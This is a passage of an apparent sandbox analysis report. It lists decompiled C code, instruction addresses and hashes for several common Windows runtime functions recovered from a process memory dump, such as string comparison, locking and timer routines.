										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x50b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E05044888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04FDEB70(_t95, 0x50b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E050095D0();
											L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E050095D0();
											L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04FDEB70(_t93, 0x50b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E050095D0();
										L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E050095D0();
										L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04FFF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x04fc52a5
0x04fc52ad
0x04fc52b0
0x04fc52b3
0x04fc52b7
0x04fc52ba
0x04fc52bf
0x04fc52c4
0x04fc52cc
0x00000000
0x00000000
0x04fc52ce
0x04fc52d9
0x04fc52dd
0x04fc52e7
0x04fc52f7
0x04fc52f9
0x04fc52fd
0x05020dcf
0x05020dd5
0x05020dd6
0x05020dd7
0x05020dd8
0x05020dd9
0x05020dde
0x05020ddf
0x05020de0
0x05020de1
0x05020de2
0x05020de5
0x05020dea
0x05020dec
0x05020f60
0x05020f64
0x05020f70
0x05020f76
0x05020f79
0x05020f79
0x00000000
0x05020f64
0x05020df2
0x05020df7
0x05020e04
0x05020e0d
0x05020e0d
0x05020e10
0x05020e1a
0x05020e1c
0x05020e4c
0x05020e52
0x05020e61
0x05020e67
0x05020e6b
0x05020e70
0x05020e76
0x05020ed7
0x05020edc
0x05020ee0
0x05020ee6
0x05020eea
0x05020eed
0x05020ef0
0x05020ef3
0x05020ef6
0x05020ef9
0x05020efe
0x05020f01
0x05020f01
0x05020f0b
0x05020f12
0x05020f16
0x05020f18
0x05020f1b
0x05020f2c
0x05020f31
0x05020f31
0x05020f35
0x05020f39
0x05020f3a
0x05020f3c
0x05020f3f
0x05020f50
0x05020f55
0x05020f55
0x05020f59
0x04fc52eb
0x04fc52f1
0x04fc52f1
0x05020e7d
0x05020e84
0x05020e88
0x05020e8a
0x05020e8d
0x05020e9e
0x05020ea3
0x05020ea3
0x05020ea7
0x05020eaf
0x05020eb3
0x05020eb9
0x05020eb9
0x05020ebc
0x05020ecd
0x05020ecd
0x00000000
0x05020eb3
0x05020e21
0x05020e2b
0x05020e2f
0x05020e30
0x05020e3a
0x05020e3f
0x05020e41
0x00000000
0x00000000
0x05020e47
0x00000000
0x05020e47
0x05020df9
0x05020dfe
0x00000000
0x00000000
0x00000000
0x05020dfe
0x04fc5303
0x04fc5307
0x00000000
0x04fc5309
0x00000000
0x04fc5309
0x04fc5307
0x04fc52e9
0x04fc52e9
0x00000000
0x04fc52e9
0x04fc530e
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 051098e4b79c8be58066795d76ec236a05888421355a482105ebbda917e6d0d2
Instruction ID: 569dde794aba8a4f6cb9426dc128c9d14fbf1167660cfa9ce55c0138434e90cf
Opcode Fuzzy Hash: 051098e4b79c8be58066795d76ec236a05888421355a482105ebbda917e6d0d2
Instruction Fuzzy Hash: 87510E31205752ABE720EF24DD45BABBBE5FF80714F14091EE495876A1E7B0F842CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04FF2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FF2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x50b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x50b8208; // 0x50b8207
				_t8 = _t57 + 0x50b8208; // 0x50b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x50b8450; // 0x320173a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x50b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x50b6d5c; // 0x7f2c0654
							_t72 =  *0x50b6d5c; // 0x7f2c0654
							_t75 =  *0x50b6d5c; // 0x7f2c0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x50b6d5c; // 0x7f2c0654
							_t84 =  *0x50b6d5c; // 0x7f2c0654
							_t87 =  *0x50b6d5c; // 0x7f2c0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0500F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x04ff2ae4
0x04ff2aec
0x04ff2aef
0x04ff2af4
0x04ff2af7
0x04ff2afd
0x04ff2b92
0x04ff2b92
0x04ff2b97
0x04ff2b9c
0x04ff2b9c
0x04ff2b03
0x04ff2b06
0x04ff2b09
0x04ff2b09
0x04ff2b0f
0x04ff2b15
0x04ff2b15
0x04ff2b1b
0x04ff2b1e
0x04ff2b21
0x04ff2b26
0x04ff2b29
0x04ff2b81
0x04ff2b84
0x04ff2c0e
0x04ff2c15
0x04ff2c24
0x04ff2c24
0x04ff2b8a
0x04ff2b8a
0x04ff2b8a
0x04ff2b8a
0x04ff2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x04ff2b4a
0x04ff2b4a
0x04ff2b4d
0x04ff2b53
0x00000000
0x00000000
0x04ff2b55
0x04ff2b58
0x04ff2bb7
0x05035d1b
0x05035d37
0x05035d47
0x05035d53
0x04ff2bbd
0x04ff2bbd
0x04ff2bbd
0x04ff2bb7
0x04ff2b5d
0x04ff2c2f
0x05035d5b
0x05035d77
0x05035d87
0x05035d93
0x04ff2c35
0x04ff2c35
0x04ff2c35
0x04ff2c2f
0x04ff2b65
0x04ff2b9f
0x04ff2ba2
0x04ff2b67
0x04ff2b67
0x04ff2b69
0x04ff2b6b
0x04ff2b6e
0x04ff2bc9
0x04ff2bcc
0x04ff2bcf
0x04ff2bd4
0x04ff2bd6
0x04ff2bd6
0x04ff2bdb
0x04ff2c02
0x04ff2c05
0x04ff2c07
0x00000000
0x04ff2c07
0x04ff2be0
0x04ff2c00
0x04ff2c3f
0x04ff2c3f
0x00000000
0x04ff2c00
0x04ff2be5
0x04ff2be7
0x04ff2bec
0x04ff2bf4
0x04ff2bf6
0x00000000
0x04ff2bf6
0x04ff2b70
0x04ff2b76
0x04ff2b2b
0x04ff2b2b
0x04ff2b2d
0x04ff2b2f
0x04ff2b32
0x04ff2b35
0x04ff2b3a
0x00000000
0x04ff2b40
0x04ff2b43
0x04ff2b45
0x04ff2b47
0x04ff2b4a
0x04ff2b4d
0x04ff2b53
0x00000000
0x00000000
0x00000000
0x04ff2b53
0x04ff2b78
0x04ff2b78
0x04ff2b7b
0x04ff2b7e
0x00000000
0x04ff2b7e
0x04ff2b76
0x04ff2ba5
0x04ff2ba5
0x04ff2ba8
0x04ff2bad
0x00000000
0x00000000
0x04ff2baf
0x04ff2baf
0x04ff2bc2
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62ae73233788439245ae3ddf68df48d36669e9abe1593b9e6f6b99a65a9facc
Instruction ID: 85c62200a2efc58bba6dbe98090d0c783bcacc4a4fe9df6ea58adefd53eb79de
Opcode Fuzzy Hash: e62ae73233788439245ae3ddf68df48d36669e9abe1593b9e6f6b99a65a9facc
Instruction Fuzzy Hash: 11518076B101258B8B14CF1CC8909BDB7B1FF98700716849AEE469B364E736BA52DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0508AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0508AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0508C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0508ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0508FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0508EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04FE7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05081608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E05091536(0x50b8ae4, (_t74 -  *0x50b8b04 >> 0x14) + (_t74 -  *0x50b8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0508C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0508A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0506CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0508ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0508ae44
0x0508ae4c
0x0508ae53
0x0508ae55
0x0508ae5c
0x0508ae64
0x0508ae68
0x0508ae75
0x0508ae75
0x0508ae78
0x0508ae7a
0x0508ae7c
0x0508ae7f
0x0508aea8
0x0508aeab
0x0508aead
0x00000000
0x00000000
0x0508aeb3
0x0508aeb8
0x0508aebb
0x0508aebd
0x00000000
0x0508ae81
0x0508ae88
0x0508ae8f
0x0508ae9b
0x0508ae96
0x0508ae96
0x0508ae96
0x0508aea0
0x0508aea3
0x0508aebf
0x0508aebf
0x0508aec3
0x0508aec9
0x0508af0d
0x0508af14
0x0508af3d
0x0508af3d
0x0508af41
0x0508af44
0x0508af67
0x0508af67
0x0508af6a
0x0508afca
0x0508afd1
0x00000000
0x0508afd1
0x0508af6c
0x0508af6d
0x0508af75
0x0508af7c
0x0508af7e
0x0508af80
0x0508af85
0x0508af87
0x0508af99
0x0508af89
0x0508af92
0x0508af92
0x0508af9e
0x0508afa1
0x0508afa3
0x0508afa9
0x0508afb0
0x0508afb2
0x0508afb4
0x0508afbc
0x0508afbc
0x0508afb4
0x0508afb0
0x00000000
0x0508afa1
0x0508af4f
0x0508af57
0x0508af5c
0x0508af5e
0x00000000
0x00000000
0x0508af60
0x0508af64
0x0508af64
0x00000000
0x0508af64
0x0508af1a
0x0508af25
0x00000000
0x00000000
0x0508af27
0x0508af28
0x0508af33
0x00000000
0x0508aed0
0x0508aed0
0x0508aed2
0x0508aee1
0x0508aee4
0x00000000
0x00000000
0x0508aee6
0x0508aeec
0x00000000
0x00000000
0x0508aefb
0x0508af07
0x0508afd3
0x0508afdb
0x0508afdb
0x00000000
0x0508af07
0x0508aed6
0x0508aed8
0x0508aedf
0x00000000
0x00000000
0x00000000
0x0508aedf
0x0508aec9

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8418538208e7b9c500a015f38b535ade52dad6eb52438789bd4e506fb17e572
Instruction ID: 7d48fd6ffa62beb87031c48779741994c6fbf40f10e859854977c2bb12662580
Opcode Fuzzy Hash: d8418538208e7b9c500a015f38b535ade52dad6eb52438789bd4e506fb17e572
Instruction Fuzzy Hash: 134125B17046119BD726EE65E885F7FB7DAFF84630F08461AF89787A91DB30D801C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 04FEDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04FEDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04FCCC50(E04FC4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04FE7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E05098ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04FE2280(_t58, _v44);
						E04FEDD82(_v44, _t102, _t98);
						E04FEB944(_t102, _v5);
						return E04FDFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x50b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x50b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x50b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x50b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x508fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x04fedbe9
0x04fedbf2
0x04fedbf7
0x04fedbf9
0x04fedbfc
0x04fedc00
0x04fedc03
0x04fedc14
0x04fedd54
0x04fedd54
0x04fedd54
0x04fedc18
0x04fedc1d
0x04fedc1d
0x04fedc32
0x04fedc3b
0x04fedc3e
0x04fedc46
0x04fedd5b
0x04fedd62
0x04fedd64
0x04fedd67
0x04fedd69
0x04fedd6b
0x04fedd6e
0x04fedd70
0x04fedd73
0x04fedd73
0x00000000
0x04fedc4c
0x04fedc4e
0x05033ae3
0x05033ae8
0x05033aea
0x04fedce7
0x04fedce9
0x04fedcec
0x04fedcee
0x04fedcf0
0x04fedcf3
0x04fedcf5
0x05033af2
0x05033af5
0x05033af5
0x04fedd06
0x04fedd08
0x04fedd0b
0x04fedd12
0x05033b08
0x04fedd18
0x04fedd18
0x04fedd18
0x04fedd20
0x04fedd23
0x05033b16
0x05033b16
0x04fedd29
0x04fedd2d
0x04fedd36
0x04fedd40
0x04fedd51
0x04fedd51
0x04fedc54
0x04fedc59
0x04fedc59
0x04fedc5e
0x04fedc5e
0x04fedc63
0x04fedc66
0x04fedc6b
0x04fedc78
0x04fedc7b
0x04fedc81
0x04fedc81
0x04fedc83
0x04fedc89
0x00000000
0x00000000
0x04fedd7b
0x04fedd7b
0x04fedc8f
0x04fedc8f
0x04fedc92
0x04fedc99
0x04fedc9f
0x04fedca5
0x04fedcaa
0x04fedcaa
0x04fedcb3
0x04fedcb8
0x04fedcbb
0x04fedcc1
0x04fedccf
0x04fedcd2
0x04fedcd5
0x04fedcd7
0x04fedcda
0x04fedcdc
0x04fedcdc
0x04fedce2
0x04fedce4
0x00000000
0x04fedce4

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce70498545218b6ced4986cf0ab379f82f088d2ee8adbe5de47fbf192d166625
Instruction ID: 874056cc19d4b466b2f673d8e7e4697e0a65836e9ebad7881efd72bf3c53810e
Opcode Fuzzy Hash: ce70498545218b6ced4986cf0ab379f82f088d2ee8adbe5de47fbf192d166625
Instruction Fuzzy Hash: A5519D71E00606DFCB24CF69C890AAEBBF6BF48351F20855AD955A7740EB30F946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04FDEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04FDEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04FC9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04FC2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
